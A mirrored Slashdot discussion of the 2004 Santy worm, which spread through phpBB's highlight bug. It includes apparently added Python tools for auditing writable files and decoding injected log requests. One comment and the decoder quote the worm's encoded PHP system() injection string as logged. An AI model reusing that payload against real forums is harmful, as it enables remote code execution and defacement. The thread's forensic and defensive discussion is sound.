Slashdot Mirror


Net Worm Uses Google to Spread

troop23 writes "A web worm that identifies potential victims by searching Google is spreading among online bulletin boards using a vulnerable version of the program phpBB, security professionals said on Tuesday. Almost 40,000 sites may have already been infected. In an odd twist, using Microsoft's search engine to scan for the phrase 'NeverEverNoSanity' (part of the defacement text that the Santy worm uses to replace files on infected Web sites) returns nearly 39,000 hits." Reader pmf sent in a few more information links: the F-Secure weblog and a Bugtraq posting. Update: 12/22 03:34 GMT by T: ZephyrXero links to this news.com article, which says Google is now squashing requests generated by the worm.

15 of 309 comments

  1. Quick! by Anonymous Coward · Score: 5, Funny

    Someone figure out a way to blame this on Microsoft!

    1. Re:Quick! by AmberBlackCat · Score: 5, Funny
      Someone figure out a way to blame this on Microsoft!

      The PHP guys will probably blame it on Apache 2.

  2. Under the Google radar by Meostro · Score: 5, Interesting

    I saw this yesterday on a.... uhh... "anatomic reference" site:
    This site is defaced!!! NeverEverNoSanity WebWorm generation 10.

    I tried to find some kind of reference and Googled for it, but I got no results.

    Still nothing on it, wonder how long it'll be before it shows up?

    MSN search returns 3 results, that's just a bit short of 39,000, so I guess they must be using the beta engine for the article.

    1. Re:Under the Google radar by orangesquid · Score: 5, Informative

      You can search for specific generations ( http://beta.search.msn.com/results.aspx?q=%22NeverEverNoSanity+WebWorm+generation+4%22&FORM=QBRE ) to see the spread:
      0, 1, 2, 3 - no hits
      4 - 2335 hits
      5 - 9297 hits
      6 - 7218 hits
      7 - 7288 hits
      8 - 10746 hits
      9 - 12009 hits
      10 - 11752 hits
      11 - 14866 hits
      12 - 13267 hits
      13 - 8393 hits
      14 - 13317 hits
      15 - 3840 hits
      16 - 5004 hits
      17 - 1950 hits
      18 - 3344 hits
      19 - 6 hits
      20 - 1 hit
      21 - 3 hits
      22 - 1 hit
      23 - 1 hit
      24 - 1 hit
      25, 26, 27, 28, 29, 30 - no hits

      --
      TheOrangeSquid: Is it any wonder things seem so awry? We swim in a sea of confusion and don't have to think to survive

  3. Headline is way too misleading by mkop · Score: 5, Informative

    There is nothing wrong with Google, only with people who have not patched the PHP bulletin boards.

    1. Re:Headline is way too misleading by taylortbb · Score: 5, Informative

      Actually, it doesn't have to do with unpatched phpBB installations. It has to do with unpatched PHP installations.

      phpBB has an explanation of what the problem is; it can be found at:
      http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=248046

      OTHER FORUMS ARE VULNERABLE

      (and no, I am not a phpBB zealot, I am pointing out a misconception)

  4. Poor /. by roman_mir · Score: 5, Funny

    I think this virus/worm hit /.; when I clicked on the link to this article, all I saw was: "Nothing for you to see here. Please move along."

  5. Latest Version of phpBB Unaffected by akiy · Score: 5, Informative

    It looks like the latest phpBB version 2.0.11 or a simple patch will thwart the worm, though. Time to upgrade if you haven't yet!

    --
    http://www.aikiweb.com - AikiWeb Aikido Information

    1. Re:Latest Version of phpBB Unaffected by Cutriss · Score: 5, Informative

      Yes and no.

      It will protect your boards from being targeted by the Google component of the worm. However, if your boards are running on a shared server, and someone else has a vulnerable version of phpBB installed on their space, you could still be vulnerable. The worm is designed to poke around once it manages to lodge itself inside a host.

      Ordinarily, you could just blame those infected in this manner for not using proper permissions on their board installs, but with the amount of custom modifications many people have installed on their boards, it'd be no surprise if 90% of the people that think they're safe actually aren't. Make sure your files aren't writeable, folks.

      --
      "Mod, mod, mod...and another troll bites the dust."

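One way to carry out Cutriss's "make sure your files aren't writeable" check on a Unix host, as an added example that is not code from this thread or from phpBB: it walks a web root and reports every file or directory that a given process identity could modify, using POSIX semantics (only the owner bits count if the process runs as the file's owner, otherwise only the group bits if it is in the file's group, otherwise the "other" bits). The uid, the group set and the three-entry directory layout are assumptions; the demo builds a constructed tree in a temporary directory.

```python
"""Report files under a web root that a given process identity could overwrite.

Added example, not code from the Slashdot thread or from phpBB. The identity
(uid plus supplementary gids) and the sample tree are assumptions.
"""
import os
import stat
import tempfile


def writable_by(st, uid, gids):
    """Return 'owner', 'group' or 'other' if a process with this uid/gids could
    write the object described by ``st``, else None.

    POSIX consults exactly one permission class: the owner bits if the process
    is the owner, otherwise the group bits if it is in the file's group,
    otherwise the 'other' bits. (uid 0 is not modelled; root writes everything.)
    """
    mode = st.st_mode
    if st.st_uid == uid:
        return 'owner' if mode & stat.S_IWUSR else None
    if st.st_gid in gids:
        return 'group' if mode & stat.S_IWGRP else None
    return 'other' if mode & stat.S_IWOTH else None


def audit_webroot(root, uid, gids):
    """Walk ``root`` and list (relative path, permission class) for every file
    or directory that ``uid``/``gids`` could modify. A writable directory counts
    too: its entries can be replaced even when they are themselves read-only."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # symlink mode bits are meaningless; audit the target separately
            how = writable_by(st, uid, gids)
            if how is not None:
                findings.append((os.path.relpath(path, root), how))
    return sorted(findings)


def demo(as_owner=False):
    """Build a constructed three-entry web root in a temp dir and audit it.

    as_owner=True models PHP running as the account that owns the files (the
    usual shared-host setup); False models a separate web-server uid that is
    in none of the files' groups.
    """
    me = os.getuid()
    uid = me if as_owner else me + 1  # me + 1: some uid that is not the owner
    with tempfile.TemporaryDirectory() as root:
        layout = {
            'index.php': 0o644,   # writable by the owner only
            'config.php': 0o666,  # world-writable: the kind of file the worm overwrote
            'cache': 0o777,       # world-writable directory
        }
        for name, mode in layout.items():
            path = os.path.join(root, name)
            if name == 'cache':
                os.mkdir(path)
            else:
                open(path, 'w').close()
            os.chmod(path, mode)  # explicit chmod, so the umask does not interfere
        return audit_webroot(root, uid, set())


if __name__ == '__main__':
    for flag in (False, True):
        print('as_owner=%s -> %s' % (flag, demo(flag)))
```

Run against a real board with the uid and groups the PHP process actually runs under; on a shared host where PHP runs as the account owner, every owner-writable file shows up, which is exactly Cutriss's point about "safe" installs that are not.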
  6. Infect Slashdot by somethinghollow · Score: 5, Funny

    When it infects sites running SlashCode, it pretends to be a legitimate post (so it can get the defacement tag "NeverEverNoSanity" on the front page), then monitors for posting and tries to get first post, too.

  7. I got hit HARD! :( by Broadband · Score: 5, Interesting

    This worm is unbelievably evil.

    What it does is search all volumes on the server for files with the .asp, .php, .shtml, .html and .htm extensions and overwrite them with the 264-byte file that simply states "Web site defaced".

    I had a backup drive with everything mirrored that was unshared and secure and it managed to overwrite my ENTIRE backup as well on that machine.

    I've been spending the past 24 hours picking up the pieces and trying to get everything back online. 1/2 done now.

    If you want to see what a defaced website looks like, go to: http://www.sherwoodoregon.com and check it out before I get that site back online.

    -BB

  8. For all of you saying it's a PHP exploit by VeneficusAcerbus · Score: 5, Informative

    From ISC:

    Note: we earlier reported that it takes advantage of a PHP vulnerability. This does not seem to be the case. The worm exploits the 'highlight' bug in phpBB 2.0.10 and earlier. The current version of phpBB (2.0.11, released Nov. 18th) fixes this problem. Nevertheless, it's still a good idea to update PHP.

  9. Not PHP Bugs - phpBB exploit is used by a16 · Score: 5, Informative

    As per the parent of this post, the post modded '+5 Informative' is false and includes the wrong announcement.

    This is not caused by the php bugs, it uses an issue in phpBB 2.0.10 and below. 2.0.11 fixes this, and has been available for ages (over a month).

    So in summary, if you use phpBB - upgrade to 2.0.11 now - not upgrading is not an option.

    I feel the above needs to be clarified, as there are already numerous people posting false information. Upgrading your PHP version won't protect against this (but you need to do it anyway to protect against other issues) - upgrading to phpBB 2.0.11 will. Simple :)

  10. This one's fun to debug - perl via url by falzbro · Score: 5, Interesting

    I got this on a few servers yesterday. At first I thought it was related to the PHP < 4.3.10 bugs; it's not.

    This exploit is actually quite clever. It inputs values into the URL field that use the chr() function in PHP to pass text. It then writes its own perl script and executes it on the server.

    Here's the first line from the logfile:
    [20/Dec/2004:11:05:48 -0600] "GET /forum/viewtopic.php?p=738&sid=2db342b717c89bf9eca3ef07e4910bf6&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527 HTTP/1.0" 200 22613 "http://example.com/forum/viewtopic.php?p=738&sid=2db342b717c89bf9eca3ef07e4910bf6&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

    If you decode the ascii characters, you get:

    perl -e "open OUT,q(>m1ho2of) and print q(HYv9po4z3jjHWanN)"

    I didn't have enough free time to decode the whole thing due to... actual work having to be done, but it's quite clever.

    --falz

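A way to do falzbro's decoding mechanically over an access log, as an added example that is not code from this thread, from phpBB or from the worm: it pulls the highlight parameter out of the request line, peels the layers of percent-encoding (the sample is encoded twice: %2527 becomes %27 becomes a quote), flags the quote-dot-call shape that breaks out of phpBB's string, and rebuilds the command from the chr() chain. The sample line is the request quoted above with Slashdot's line-wrapping spaces removed and the referer replaced by "-"; the benign second line is constructed.

```python
"""Pull the phpBB 'highlight' payload out of an access-log line and decode it.

Added example, not code from the Slashdot thread, phpBB or the worm. It follows
the decoding falzbro describes: the parameter is percent-encoded twice and the
command is spelled out as a chain of PHP chr() calls.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample: the request line quoted in the thread, with the spaces
# Slashdot inserted for wrapping removed and the referer replaced by "-".
SAMPLE_LOG_LINE = (
    '[20/Dec/2004:11:05:48 -0600] "GET /forum/viewtopic.php?p=738'
    '&sid=2db342b717c89bf9eca3ef07e4910bf6&highlight='
    '%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)'
    '%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)'
    '%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)'
    '%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)'
    '%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)'
    '%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)'
    '%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)'
    '%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)'
    '%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)'
    '%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)'
    '%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)'
    '%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)'
    '%252echr(34))%252e%2527 HTTP/1.0" 200 22613 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"'
)

# Constructed benign line: an ordinary search-highlight request.
BENIGN_LOG_LINE = (
    '[20/Dec/2004:11:07:02 -0600] "GET /forum/viewtopic.php?t=42&highlight=santy'
    ' HTTP/1.0" 200 9876 "-" "Mozilla/4.0"'
)

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
CHR_RE = re.compile(r'chr\((\d{1,3})\)')
# A quote that closes phpBB's string, a PHP concatenation dot, then a call:
# the shape of the injection whichever function the payload calls.
BREAKOUT_RE = re.compile(r"""['"]\s*\.\s*[A-Za-z_]\w*\s*\(""")


def highlight_param(log_line):
    """Return the highlight= value as the web server hands it to PHP (one
    percent-decoding pass already applied by parse_qs), or None if absent."""
    m = REQUEST_RE.search(log_line)
    if m is None:
        return None
    query = urlsplit(m.group('target')).query
    values = parse_qs(query, keep_blank_values=True).get('highlight')
    return values[0] if values else None


def strip_encoding_layers(value):
    """Keep percent-decoding until nothing changes; return (plaintext, extra passes)."""
    passes = 0
    while True:
        decoded = unquote(value)
        if decoded == value:
            return value, passes
        value, passes = decoded, passes + 1


def chr_chain_to_text(php_fragment):
    """Rebuild the string a PHP chr(n).chr(n)... chain evaluates to."""
    return ''.join(chr(int(n)) for n in CHR_RE.findall(php_fragment))


def analyse(log_line):
    """Describe the highlight parameter of one log line, or None if it has none."""
    raw = highlight_param(log_line)
    if raw is None:
        return None
    plain, extra = strip_encoding_layers(raw)
    return {
        'decode_passes': 1 + extra,  # 1 = the decode the server itself performs
        'php_fragment': plain,
        'suspicious': BREAKOUT_RE.search(plain) is not None,
        'command': chr_chain_to_text(plain),
    }


def scan(log_lines):
    """Return the analyses of every line whose highlight parameter looks injected."""
    return [info for info in map(analyse, log_lines) if info and info['suspicious']]


if __name__ == '__main__':
    for hit in scan([SAMPLE_LOG_LINE, BENIGN_LOG_LINE]):
        print('decode passes:', hit['decode_passes'])
        print('PHP fragment :', hit['php_fragment'][:40] + '...')
        print('command      :', hit['command'])
```

The detection keys on the string-breakout shape rather than on the word system, so a variant that calls a different function, or spells the command some other way, still surfaces; the decoded command is there for the analyst, not for the rule.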
  11. Re:Clarification by ScottMacVicar · Score: 5, Informative

    I've been looking at the PHP related security hole and this does not have anything to do with the exploit the worm uses.

    The PHP exploit was to do with the length part of a serialized string: it wasn't correctly enforced, and a suitably large value would cause a crash and print out the contents of the stack, which could include any variable within the script. In s:1000:"test"; the 1000 part is not correctly checked.

    The phpBB exploit is regarding a remote code execution vulnerability, in this case it uses this vulnerability to fetch a perl script from a remote server and write it to the forum before executing it using the system command in PHP.

    So this worm only affects phpBB 2.0.10 and below.